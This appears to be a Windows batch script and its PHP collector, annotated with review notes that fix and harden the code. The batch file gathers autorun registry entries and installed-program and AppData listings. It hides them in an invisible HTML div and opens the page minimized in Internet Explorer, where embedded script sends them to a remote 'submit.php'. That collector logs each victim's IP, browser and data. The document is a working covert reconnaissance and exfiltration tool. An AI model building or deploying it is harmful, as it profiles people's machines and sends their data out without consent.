REGEDITGET.BAT

REGEDITGET.BAT:

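::regeditget.bat: collect the autorun registry keys and the Program Files / AppData folder
::  listings into an HTML log in %TEMP%, then open it in Internet Explorer; the script embedded
::  in the log sends its content to the collector (submit.php) as a JSONP GET request.
::usage: set the collector URL in variable "second" (url: '...'); the browser is located via
::  %ProgramFiles% in the "start" line.
::NOTE(review): reading HKLM/HKCU ...\Run and writing under %TEMP% does not normally need
::  elevation; the original advice to run as administrator is kept only as advice.
::NOTE(review): the log travels as a GET query string to a plain http:// URL, i.e. in clear
::  text, and its size is bounded by the browser's URL length limit (Internet Explorer's is
::  roughly 2 KB), so long listings are likely to be truncated. Only the two ...\Run keys are
::  queried; RunOnce and the Wow6432Node view on 64-bit Windows are not covered.

@echo off
setlocal EnableDelayedExpansion

:: The original kept the log path in a variable named "path", which overwrote %PATH% and so
:: REG.EXE could no longer be found through the search path. Use a dedicated name and quote it
:: everywhere, since %TEMP% may contain spaces.
set "logfile=%TEMP%\reg.html"
:: "first"/"second" contain < and >; they are written via !delayed! expansion so that cmd does
:: not treat them as redirections.
set "first=<html><head><style>#content{display:none;}</style><script src=https://code.jquery.com/jquery-1.10.2.js></script></head><body><div id=content>"
set "second=</div><script>content=document.getElementById('content').innerHTML;$.ajax({ type: 'GET', dataType: 'jsonp', data: content, url: 'http://sitename/submit.php' });</script></body></html>"

echo !first! >"%logfile%"

echo AUTORUN >>"%logfile%"
REG QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run >>"%logfile%"
REG QUERY HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run >>"%logfile%"

:: List the directories by absolute path instead of "cd ... & dir": cd without /d does not
:: switch drives, and when cd fails "dir" silently lists the current directory instead.
echo PROGRAM FILES >>"%logfile%"
dir /b "%ProgramFiles%" >>"%logfile%"

:: ProgramFiles(x86) only exists on 64-bit Windows; keep the section header (submit.php keys
:: its markup on it) but skip the listing when the variable is empty.
echo PROGRAM FILES (X86) >>"%logfile%"
if not "%ProgramFiles(x86)%"=="" dir /b "%ProgramFiles(x86)%" >>"%logfile%"

echo APPDATA >>"%logfile%"
dir /b "%APPDATA%" >>"%logfile%"

echo !second! >>"%logfile%"

start /min "" "%ProgramFiles%\Internet Explorer\iexplore.exe" "%logfile%"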

submit.php:

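<?php
// submit.php: collector for regeditget.bat. The batch file's page sends the log text as the
// raw query string of a JSONP GET; PHP turns that text into $_REQUEST *keys* (spaces and dots
// become "_", values are empty), which is why the markup below is keyed on "_"-joined tokens.
// Each hit is appended to its own HTML file next to this script.
//
// NOTE(review): everything handled here (X-Forwarded-For, Referer, User-Agent and the
// $_REQUEST keys) is client-controlled. The original wrote it into the log HTML verbatim, so
// anyone who could reach this URL could plant script that runs when the operator opens a log
// in a browser. All request-derived text is now escaped before the markup is added.
// NOTE(review): the log files are created in the script's own directory under a predictable
// name with a .html extension; if that directory is web-served they are readable by anyone
// who can guess the name. Keep them outside the document root.

$date    = date('d.m.Y H:i:s');
$ip      = (string) getenv('REMOTE_ADDR');
$real_ip = (string) getenv('HTTP_X_FORWARDED_FOR'); // client-supplied; only meaningful behind a trusted proxy
$otkuda  = (string) getenv('HTTP_REFERER');
$browser = (string) getenv('HTTP_USER_AGENT');

// Escape request-derived text for inclusion in the HTML log.
function log_escape($s)
{
    return htmlspecialchars((string) $s, ENT_QUOTES, 'UTF-8');
}

// The Referer becomes a clickable link only when it is an http(s) URL; anything else
// (e.g. a javascript: URL) is shown as plain text. The original emitted href= unquoted.
if (preg_match('#^https?://#i', $otkuda)) {
    $ref_html = '<a href="'.log_escape($otkuda).'">'.log_escape($otkuda).'</a>';
} else {
    $ref_html = log_escape($otkuda);
}

$style = '<style>body{font-family:monospace;font-size:14px;color:#444;width:100%;margin:0;padding:15px;box-sizing:border-box;word-wrap:break-word;}b{color:#000;}font:nth-child(3n+3){color:red!important;}</style>';
$log = $style."<br><div><b>[".$date."]</b> <b>IP:</b> ".log_escape($ip)."<b> REAL IP(if used proxy): ".log_escape($real_ip)."</b><br/>[".$ref_html."]<br/>".log_escape($browser)."</div>\n\n";

$datename = date('[d.m.Y_H.i.s]');
// REMOTE_ADDR is set by the server, but restrict it to address characters anyway so the
// file name can never contain a path separator.
$safe_ip  = preg_replace('/[^0-9A-Za-z.:]/', '_', $ip);
$filename = $datename."_[".$safe_ip."].html";

// The original passed the bare constant a as the mode (a notice on PHP 5/7, a fatal Error
// on PHP 8); the mode is the string 'a'. Fail explicitly instead of warning on every fwrite.
$file = fopen($filename, 'a');
if ($file === false) {
    header('HTTP/1.1 500 Internal Server Error');
    exit;
}
fwrite($file, $log);

foreach (array_keys($_REQUEST) as $key) {
    // Escape first, then insert the markup the log viewer relies on; none of the search
    // strings below contain HTML-special characters, so they still match after escaping.
    $text = log_escape($key);
    $text = str_replace('callback', '', $text);
    $text = str_replace('AUTORUN_', '<br><br><b>AUTORUN:</b>', $text);
    $text = str_replace('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run', '<br><br><b>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</b><font></font><font>', $text);
    $text = str_replace('HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run', '</font><br><br><b>HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</b><font></font><font></font><font>', $text);
    $text = str_replace('____', '</font><br><font>', $text);
    $text = str_replace('PROGRAM_FILES_', '</font><br><br><b>PROGRAM_FILES:</b><br>', $text);
    $text = str_replace('PROGRAM_FILES(X86)_', '<br><br><b>PROGRAM_FILES(X86):</b><br>', $text);
    $text = str_replace('APPDATA', '<br><br><b>APPDATA:</b><br>', $text);
    fwrite($file, $text);
}
fwrite($file, ' ');
fclose($file);
?>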
